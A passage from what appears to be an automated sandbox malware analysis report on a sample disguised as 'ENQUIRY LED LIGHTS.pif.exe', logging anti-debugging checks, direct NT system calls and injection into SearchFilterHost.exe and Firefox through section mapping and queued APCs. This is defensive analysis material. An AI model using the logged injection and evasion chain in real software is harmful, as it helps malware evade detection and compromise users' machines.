            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F30BCB mov eax, dword ptr fs:[00000030h]3_2_02F30BCB
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F10BCD mov eax, dword ptr fs:[00000030h]3_2_02F10BCD
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F10BCD mov eax, dword ptr fs:[00000030h]3_2_02F10BCD
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F10BCD mov eax, dword ptr fs:[00000030h]3_2_02F10BCD
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20BBE mov eax, dword ptr fs:[00000030h]3_2_02F20BBE
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F20BBE mov eax, dword ptr fs:[00000030h]3_2_02F20BBE
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC4BB0 mov eax, dword ptr fs:[00000030h]3_2_02FC4BB0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC4BB0 mov eax, dword ptr fs:[00000030h]3_2_02FC4BB0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F0CB7E mov eax, dword ptr fs:[00000030h]3_2_02F0CB7E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FBEB50 mov eax, dword ptr fs:[00000030h]3_2_02FBEB50
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC4B4B mov eax, dword ptr fs:[00000030h]3_2_02FC4B4B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC4B4B mov eax, dword ptr fs:[00000030h]3_2_02FC4B4B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB8B42 mov eax, dword ptr fs:[00000030h]3_2_02FB8B42
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA6B40 mov eax, dword ptr fs:[00000030h]3_2_02FA6B40
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA6B40 mov eax, dword ptr fs:[00000030h]3_2_02FA6B40
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDAB40 mov eax, dword ptr fs:[00000030h]3_2_02FDAB40
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3EB20 mov eax, dword ptr fs:[00000030h]3_2_02F3EB20
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3EB20 mov eax, dword ptr fs:[00000030h]3_2_02F3EB20
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD8B28 mov eax, dword ptr fs:[00000030h]3_2_02FD8B28
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FD8B28 mov eax, dword ptr fs:[00000030h]3_2_02FD8B28
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8EB1D mov eax, dword ptr fs:[00000030h]3_2_02F8EB1D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8EB1D mov eax, dword ptr fs:[00000030h]3_2_02F8EB1D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8EB1D mov eax, dword ptr fs:[00000030h]3_2_02F8EB1D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8EB1D mov eax, dword ptr fs:[00000030h]3_2_02F8EB1D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8EB1D mov eax, dword ptr fs:[00000030h]3_2_02F8EB1D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8EB1D mov eax, dword ptr fs:[00000030h]3_2_02F8EB1D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8EB1D mov eax, dword ptr fs:[00000030h]3_2_02F8EB1D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8EB1D mov eax, dword ptr fs:[00000030h]3_2_02F8EB1D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8EB1D mov eax, dword ptr fs:[00000030h]3_2_02F8EB1D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4C8F9 mov eax, dword ptr fs:[00000030h]3_2_02F4C8F9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4C8F9 mov eax, dword ptr fs:[00000030h]3_2_02F4C8F9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDA8E4 mov eax, dword ptr fs:[00000030h]3_2_02FDA8E4
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F3E8C0 mov eax, dword ptr fs:[00000030h]3_2_02F3E8C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9C89D mov eax, dword ptr fs:[00000030h]3_2_02F9C89D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F10887 mov eax, dword ptr fs:[00000030h]3_2_02F10887
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA6870 mov eax, dword ptr fs:[00000030h]3_2_02FA6870
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA6870 mov eax, dword ptr fs:[00000030h]3_2_02FA6870
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9E872 mov eax, dword ptr fs:[00000030h]3_2_02F9E872
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9E872 mov eax, dword ptr fs:[00000030h]3_2_02F9E872
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F40854 mov eax, dword ptr fs:[00000030h]3_2_02F40854
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F14859 mov eax, dword ptr fs:[00000030h]3_2_02F14859
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F14859 mov eax, dword ptr fs:[00000030h]3_2_02F14859
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F22840 mov ecx, dword ptr fs:[00000030h]3_2_02F22840
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB483A mov eax, dword ptr fs:[00000030h]3_2_02FB483A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB483A mov eax, dword ptr fs:[00000030h]3_2_02FB483A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4A830 mov eax, dword ptr fs:[00000030h]3_2_02F4A830
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F32835 mov eax, dword ptr fs:[00000030h]3_2_02F32835
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F32835 mov eax, dword ptr fs:[00000030h]3_2_02F32835
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F32835 mov eax, dword ptr fs:[00000030h]3_2_02F32835
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F32835 mov ecx, dword ptr fs:[00000030h]3_2_02F32835
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F32835 mov eax, dword ptr fs:[00000030h]3_2_02F32835
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F32835 mov eax, dword ptr fs:[00000030h]3_2_02F32835
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9C810 mov eax, dword ptr fs:[00000030h]3_2_02F9C810
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F429F9 mov eax, dword ptr fs:[00000030h]3_2_02F429F9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F429F9 mov eax, dword ptr fs:[00000030h]3_2_02F429F9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9E9E0 mov eax, dword ptr fs:[00000030h]3_2_02F9E9E0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A9D0 mov eax, dword ptr fs:[00000030h]3_2_02F1A9D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A9D0 mov eax, dword ptr fs:[00000030h]3_2_02F1A9D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A9D0 mov eax, dword ptr fs:[00000030h]3_2_02F1A9D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A9D0 mov eax, dword ptr fs:[00000030h]3_2_02F1A9D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A9D0 mov eax, dword ptr fs:[00000030h]3_2_02F1A9D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A9D0 mov eax, dword ptr fs:[00000030h]3_2_02F1A9D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F449D0 mov eax, dword ptr fs:[00000030h]3_2_02F449D0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FDA9D3 mov eax, dword ptr fs:[00000030h]3_2_02FDA9D3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA69C0 mov eax, dword ptr fs:[00000030h]3_2_02FA69C0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F989B3 mov esi, dword ptr fs:[00000030h]3_2_02F989B3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F989B3 mov eax, dword ptr fs:[00000030h]3_2_02F989B3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F989B3 mov eax, dword ptr fs:[00000030h]3_2_02F989B3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F229A0 mov eax, dword ptr fs:[00000030h]3_2_02F229A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F109AD mov eax, dword ptr fs:[00000030h]3_2_02F109AD
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FB4978 mov eax, dword ptr fs:[00000030h]3_2_02FB4978
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9C97C mov eax, dword ptr fs:[00000030h]3_2_02F9C97C
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F36962 mov eax, dword ptr fs:[00000030h]3_2_02F36962
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F5096E mov eax, dword ptr fs:[00000030h]3_2_02F5096E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F5096E mov edx, dword ptr fs:[00000030h]3_2_02F5096E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F90946 mov eax, dword ptr fs:[00000030h]3_2_02F90946
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA892B mov eax, dword ptr fs:[00000030h]3_2_02FA892B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9892A mov eax, dword ptr fs:[00000030h]3_2_02F9892A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F08918 mov eax, dword ptr fs:[00000030h]3_2_02F08918
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9C912 mov eax, dword ptr fs:[00000030h]3_2_02F9C912
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F8E908 mov eax, dword ptr fs:[00000030h]3_2_02F8E908
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F48EF5 mov eax, dword ptr fs:[00000030h]3_2_02F48EF5
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F16EE0 mov eax, dword ptr fs:[00000030h]3_2_02F16EE0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC6ED0 mov ecx, dword ptr fs:[00000030h]3_2_02FC6ED0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FAAEB0 mov eax, dword ptr fs:[00000030h]3_2_02FAAEB0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F9CEA0 mov eax, dword ptr fs:[00000030h]3_2_02F9CEA0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00446B64 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00446B64
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_0044860B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0044860B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: NULL target: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeSection loaded: NULL target: C:\Windows\SysWOW64\SearchFilterHost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: NULL target: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: NULL target: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeThread register set: target process: 8148Jump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeThread APC queued: target process: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess created: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe "C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe"Jump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeProcess created: C:\Windows\SysWOW64\SearchFilterHost.exe "C:\Windows\SysWOW64\SearchFilterHost.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: bdtKgWWjtPR.exe, 00000007.00000002.2977085828.0000000001690000.00000002.00000001.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000007.00000000.1985749724.0000000001690000.00000002.00000001.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2976815438.00000000011D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: bdtKgWWjtPR.exe, 00000007.00000002.2977085828.0000000001690000.00000002.00000001.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000007.00000000.1985749724.0000000001690000.00000002.00000001.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2976815438.00000000011D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: bdtKgWWjtPR.exe, 00000007.00000002.2977085828.0000000001690000.00000002.00000001.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000007.00000000.1985749724.0000000001690000.00000002.00000001.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2976815438.00000000011D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: bdtKgWWjtPR.exe, 00000007.00000002.2977085828.0000000001690000.00000002.00000001.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000007.00000000.1985749724.0000000001690000.00000002.00000001.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2976815438.00000000011D0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
